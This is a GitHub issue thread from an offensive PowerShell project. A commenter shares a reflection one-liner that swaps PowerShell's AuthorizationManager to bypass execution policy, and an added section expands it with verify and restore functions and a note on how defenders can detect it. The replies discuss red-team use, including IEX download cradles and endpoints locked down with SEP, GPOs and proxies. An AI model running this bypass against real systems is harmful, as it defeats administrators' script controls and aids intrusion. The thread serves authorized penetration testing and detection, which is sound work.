PowerShellEmpire / PowerTools

PowerTools is a collection of PowerShell projects with a focus on offensive operations.

Powershell signing #70

Closed h-a-t-zz closed 8 years ago

h-a-t-zz commented 8 years ago

Hi Guys,

Thanks for your awesome work on Red Teaming with PowerShell. If I may suggest a one-liner for deactivating the PowerShell execution policy "issue", for when "powershell.exe -exec bypass" doesn't work.

```powershell
function Disable-ExecutionPolicy {
    # Reach the engine's internal ExecutionContext via reflection, then replace its
    # policy-enforcing AuthorizationManager with the permissive base class.
    # Process-local and unprivileged: the registry/GPO policy values are not touched.
    ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue($executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
}
```

src: http://www.nivot.org/blog/post/2012/02/10/Bypassing-Restricted-Execution-Policy-in-Code-or-in-Script

I've just tested it on an assignment, and it seems to work out very well. Hope that will help. Cheers!
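The same swap, as an added example that is not part of the original post or the PowerTools project, wrapped with a before/after check and a restore step so the session can be put back the way it was. The internal field names `_context` and `_authorizationManager` are taken from the snippet above; they are private to System.Management.Automation, so treat their presence as an assumption about the engine version in use (Windows PowerShell 5.1 is the assumed target) and expect to verify them before relying on this elsewhere. The throwaway script written to `$env:TEMP` is constructed input for the demonstration.

```powershell
# Added example (not project code): verify, apply and undo the AuthorizationManager swap.
# Assumption: the private field names "_context" and "_authorizationManager" exist in the
# running engine (true for Windows PowerShell 5.1; confirm on other versions).

function Get-EngineAuthorizationManager {
    # Returns the live AuthorizationManager the engine consults before loading a script file,
    # plus the reflection handles needed to replace it.
    $ctx   = $ExecutionContext.GetType().GetField('_context', 'NonPublic,Instance').GetValue($ExecutionContext)
    $field = $ctx.GetType().GetField('_authorizationManager', 'NonPublic,Instance')
    [pscustomobject]@{ Context = $ctx; Field = $field; Manager = $field.GetValue($ctx) }
}

function Disable-ExecutionPolicy {
    # Swap the policy-enforcing Microsoft.PowerShell.PSAuthorizationManager for the base class,
    # whose ShouldRun permits everything. Process-local: registry and GPO values are untouched,
    # and no elevation is needed because only this process's memory changes.
    $am = Get-EngineAuthorizationManager
    $script:OriginalAuthorizationManager = $am.Manager
    $am.Field.SetValue($am.Context, (New-Object System.Management.Automation.AuthorizationManager 'Microsoft.PowerShell'))
}

function Restore-ExecutionPolicy {
    # Put the saved manager back so policy enforcement resumes for this session.
    if ($null -eq $script:OriginalAuthorizationManager) {
        throw 'Nothing saved; call Disable-ExecutionPolicy first.'
    }
    $am = Get-EngineAuthorizationManager
    $am.Field.SetValue($am.Context, $script:OriginalAuthorizationManager)
    $script:OriginalAuthorizationManager = $null
}

function Test-ScriptFileRuns {
    param([Parameter(Mandatory)][string]$Path)
    # Dot-source a file from disk; the execution-policy check throws before any of it runs.
    try   { . $Path | Out-Null; return $true }
    catch { return $false }
}

# Demo: constructed throwaway script on disk, compared before and after the swap.
$tmp = Join-Path $env:TEMP 'ep-demo.ps1'
Set-Content -Path $tmp -Value 'Write-Output "ran from disk"'

"Policy reported by Get-ExecutionPolicy : $(Get-ExecutionPolicy)"
"Manager before swap                    : $((Get-EngineAuthorizationManager).Manager.GetType().FullName)"
"Script file runs before swap           : $(Test-ScriptFileRuns -Path $tmp)"

Disable-ExecutionPolicy
"Manager after swap                     : $((Get-EngineAuthorizationManager).Manager.GetType().FullName)"
"Script file runs after swap            : $(Test-ScriptFileRuns -Path $tmp)"
# Get-ExecutionPolicy reads the configured policy scopes, not the live manager object,
# so it still reports the original value even though script files now load.
"Get-ExecutionPolicy still reports      : $(Get-ExecutionPolicy)"

Restore-ExecutionPolicy
"Manager after restore                  : $((Get-EngineAuthorizationManager).Manager.GetType().FullName)"
Remove-Item -Path $tmp
```

Two caveats worth keeping in mind when using this. First, it only answers the execution-policy question: AMSI, Constrained Language Mode and any EDR hooks in the process are unaffected, so "policy disabled" does not mean "content unscreened". Second, because the swap is a script block run through the engine, PowerShell script block logging (event 4104 in Microsoft-Windows-PowerShell/Operational, when enabled) records its text, including the literal `_authorizationManager` string, which is an easy thing for a defender to search for.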

HarmJ0y commented 8 years ago

Hey, thanks for reaching out with the cool trick!

I'm trying to get my head around how exactly to use this operationally. It doesn't seem like it makes sense to integrate into any of the scripts themselves, as we'll hit the catch-22 of the code not being able to run to determine if it needs to disable the policy. In the PowerShell integration in Cobalt Strike and our weaponization with Empire we use the IEX download cradle and stay off of disk, so execution policy never even enters into our thinking, as a script is not loaded off of disk. All that said, not trying to be dismissive, just trying to get an idea of how you would envision this trick being used in these projects.

h-a-t-zz commented 8 years ago

Hey, sorry for the late response. This specific assignment had endpoints with SEP installed, along with tightly managed GPOs and proxied connectivity: IEX was out of use, as GitHub and Pastebin were filtered, and even a SimpleHTTPServer within the internal network hosting the scripts was unreachable. The only "external access" was USB. This post wasn't intended to propose a pull request, but only a suggestion for when execution off disk is not possible, with a cool unprivileged PowerShell trick :) Hope this helps anyhow o/

stufus commented 8 years ago

@hi-t-ch I had the same thing on a recent engagement and that trick did indeed work to get round the Import-Module issue. That said, an IEX cradle worked without a problem so it never "became" a problem, but I can vouch for the above :)

h-a-t-zz commented 8 years ago

Ouh! Forgot to close this "issue". My bad. Thanks for the confirmation @stufus o/